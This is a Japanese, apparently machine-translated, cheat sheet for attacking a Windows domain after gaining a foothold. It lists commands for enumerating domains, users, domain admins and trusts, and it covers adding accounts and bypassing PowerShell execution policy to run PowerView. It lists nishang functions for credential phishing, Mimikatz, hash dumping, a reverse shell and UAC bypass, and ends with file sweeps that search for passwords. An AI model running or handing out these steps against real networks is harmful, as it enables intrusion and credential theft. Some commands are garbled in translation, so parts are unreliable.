私の連絡先情報
郵便メール:
2024-07-12
한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina
4 つの状況:
1. ローカルユーザー: ユーザー
2. ローカル管理者ユーザー: ホーム バージョンでは無効、サーバーでのみ使用可能
3. ドメイン内のユーザー
4. ドメイン管理者
一般のローカルユーザーはドメイン情報を取得できません
ローカル管理者ユーザーは、自分の権限をシステム ユーザー (ドメイン内のユーザー) に直接昇格し、ドメイン内の情報を取得できます。
1. ドメインが存在するかどうかを確認します。
1. ドメインを確認します: ipconfig/all、systeminfo、または net config workstation
ipconfig /all: 見つかったドメイン: hack.com
systeminfo: 見つかったドメイン: hack.com
2. ドメインの DNS ホストを表示します: nslookup ドメイン名 (hack.com)
3.ネットタイム/ドメインの3つの状況
ドメインは存在しますが、現在のユーザーはドメイン ユーザーではありません
ドメインが存在し、現在のユーザーがドメイン ユーザーである
現在のネットワーク環境はワークグループであり、ドメインが存在しません
1.net view: ドメイン一覧、コンピュータ一覧、指定したコンピュータの共有リソースを表示: net view (コンピュータの一覧を表示) net view \computer (指定した共有コンピュータの表示)
net view /domain:ドメイン名 (ハック) (コンピュータのリストを表示)
2.ローカル ユーザーを表示するには net user: ドメイン内のユーザー数を表示するには net user /domain
ユーザーの追加: net ユーザー名 (admin) パスワード (123)/add
3.net 使用: コンピュータを接続するか、共有リソースからコンピュータを切断し、コンピュータの接続情報を表示します。
4.net time: 時間を使用してコンピュータまたはドメインを同期します: net time \computer net time /domain
5.net start: サービスを開始するか、開始されたサービスを表示します: net start service
6.netポーズ:実行中のサービスを一時停止します:ネットポーズサービス
7.net continue: サービスを再アクティブ化します: net continue service
8.net stop: Windows NT/2000/2003 サービスを停止します: net stop サービス
9.net share: 共有リソースの削除、作成、または表示
10.net session: ローカル コンピュータとそれに接続されているクライアントのセッションを一覧表示するか、切断します。
net session //computer (リストされるかセッション化されるコンピュータを識別します)
net session //computer delete (指定したコンピュータのセッションを切断します)
11.net localgroup コンピュータ グループの表示 (ローカルにのみ適用): net localgroup ユーザー名
ドメインユーザー: net localgroup ユーザー名/ドメイン
12.net group は、ドメイン内のグループの名前をクエリします (ドメイン コントローラーにのみ適用されます): net group /domain
13.net config は、現在実行中の構成可能なサービスを表示するか、サービスの構成を (ローカルで) 表示および変更します。
net config (実行中のサービスを表示) net config services (サービスのリストを表示)
14.net コンピュータ ドメイン データベースからコンピュータを追加または削除します。
net コンピュータ \コンピュータ名 /add または /del (ログイン ドメインへのコンピュータの追加または削除)
「このワークグループのサーバー リストは現在利用できません」と表示された場合は、サーバー、ワークステーション、コンピューターのブラウザーのサービスを有効にし、ファイアウォールを閉じます。
ドメインの表示: ipconfig/all、systeminfo、または net config workstation
ドメインの DNS ホストを表示します: nslookup ドメイン名 (hack.com)
クエリドメイン: net view /domain
ドメイン内のすべてのコンピュータをクエリします: net view /domain:ドメイン名
ドメイン内のすべてのユーザー グループのリストをクエリします: net group /domain
すべてのドメイン メンバーのコンピュータ リストをクエリします: net group "domain Computers" /domain
ドメイン内のパスワード情報を照会します: net accounts /domain
ドメインの信頼情報を取得します: nltest /domain_trusts
ドメイン コントローラー名を表示します: nltest /DCLIST:hack
マシン名を表示し、IP を見つけます。ping/nslookup: ping/nslookup ドメイン コントローラー名
ここで ping が無効になる場合があります。
ドメイン コントローラーのホスト名を表示: nslookup ‐type=SRV _ldap._tcp
現在時刻を確認します: net time /domain
ドメイン コントローラー グループを表示します: net group "Domain Controllers" /domain
1. ドメイン内のユーザー情報をクエリします: net user /domain
2. ローカル ユーザーの表示: wmic useraccount get name ドメイン ユーザー: wmic useraccount get domain,name
ローカルユーザー:
ドメインユーザー:
3. 既存のユーザーを確認します: dsquery ユーザー (場合によっては実行されず、サーバー マシン上でのみ実行できる場合があります)
4. ローカル管理者のユーザー グループをクエリします: net localgroupAdministrators
5. ドメイン管理者ユーザーをクエリします: net group "domain admins" /domain
6. ドメイン管理者のユーザー グループをクエリします: net group "Enterprise Admins" /domain
ここでは 2 つのツールが必要です
まずツールをサーバーにアップロードしてから実行します
1.PVEFindADUser: PVEFindADUser.exe -current (パスに注意してください) このツールは、どのユーザーがコンピュータにログインしているかを確認し、ドメイン管理者を見つけることができます。
2.powerView スクリプト:
powershell.exe ‐exec bypass ‐command "& { import‐module .PowerView.ps1;Invoke‐UserHunter}"
最初にアクセス許可を確認します: Get-ExecutionPolicy
実行ポリシーを変更します: Set-ExecutionPolicy Unrestricted (無制限のアクセス許可のみが pow を実行できます)
nishang ツール (前の記事にダウンロード リンクがあります):
CS ディレクトリに配置した後、直接インポートします: powershell-import nishang/nishang.psm1
実行:powershellコマンド
よく使用されるいくつかのコマンド:
Check-VM: ホストが仮想マシンであるかどうかを確認します。
Invoke-CredentialsPhish: ユーザーをだましてパスワードを入力させます
Get-WLAN-Keys: Wi-Fi 情報
Invoke-Mimikatz: パスワードをキャッチする
Get-PassHashes: ハッシュを取得します。
Get-PassHints: ユーザーのパスワードヒント情報を取得します。
Invoke-PowerShellTcp: リバウンド シェル
Invoke-PsUACme: UAC をバイパスする
削除-更新: パッチを削除します。
Get-Information: ローカル情報
例: powershell チェック VM
1. さまざまな機密ファイルを指定されたディレクトリに収集します
dir /a /s /bd:"*.txt"
dir /a /s /b C:"*.xlsx"
dir /a /s /bd:"*.md"
dir /a /s /bd:"*.sql"
dir /a /s /bd:"*.pdf"
dir /a /s /bd:"*.docx"
dir /a /s /bd:"*.doc"
dir /a /s /bd:"*conf*"
dir /a /s /bd:"*戻る*"
dir /a /s /bd:"*パスワード*"
dir /a /s /bd:"*pass*"
dir /a /s /bd:"*ログイン*"
dir /a /s /bd:"*ユーザー*"
2. 指定したディレクトリ内のファイルからさまざまなアカウントのパスワードを収集します
findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si ユーザパスワード *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si ログイン *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si ユーザー *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
例: dir /a /s /bd:"*.txt"